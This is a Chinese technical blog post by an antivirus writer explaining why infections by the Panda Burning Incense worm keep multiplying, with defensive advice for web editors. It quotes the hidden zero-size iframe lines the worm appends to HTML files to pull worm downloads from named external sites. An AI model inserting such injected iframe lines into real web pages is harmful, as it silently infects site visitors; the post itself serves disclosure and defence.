熊猫为什么越来越多
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://litiejun.blog.51cto.com/134711/21780 |
发现询问熊猫烧香病毒的越来越多,除了变种太多外,发现这个感染型病毒还有个重要特征,它可以感染HTML文件,在感染过的HTML文件末尾加了两行 </html>< src=http://www.ctv163.com/wuhan/down.htm width=0 height=0></i> <iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe> 这两行修改就会导致你访问该html文件时,浏览器会尝试从http://www.ctv163.com/wuhan/down.htm或http://www.krvkr.com/worm.htm下载程序,一般情况下,IE这个时候会有安全提示。 如果刚好,你的IE安全等级比较低,或者,你的内部intranet站点服务器被熊猫烧香感染了,而你的内部站点可能刚好在你的IE信任列表中,那就危险了。浏览器会自动下载并执行来自http://www.krvkr.com/worm.htm 或http://www.ctv163.com/wuhan/down.htm站点的危险程序,而这个程序可能是熊猫的最新变种。 另外,熊猫还有部分变种可以直接下载更新,这个够狠吧。病毒在线更新,变种源源不断。 还有个非常重要的原因,我们的法律对病毒制作者、传播者太放任了,完全是可以关闭上面提到的两个网站的呀。 中了熊猫一定要快速处理,对于网站编辑,这点尤其重要,一旦网站编辑人员的电脑被熊猫感染,意味着,你的带毒Web页可能会上传到服务器,而重新镜像一个新的Web页要花更多的时间。 另外,补充一点,毒霸已经把HTML文档中病毒修改的那行加入病毒库了,可以直接删除HTML文件末尾的病毒特征,网编要是中了,就用毒霸把你的web文档检查一下。 本文出自 “铁军的杀毒圈子” 博客,请务必保留此出处http://litiejun.blog.51cto.com/134711/21780 本文出自 51CTO.COM技术博客 |
李铁军
博客统计信息
热门文章
最新评论
友情链接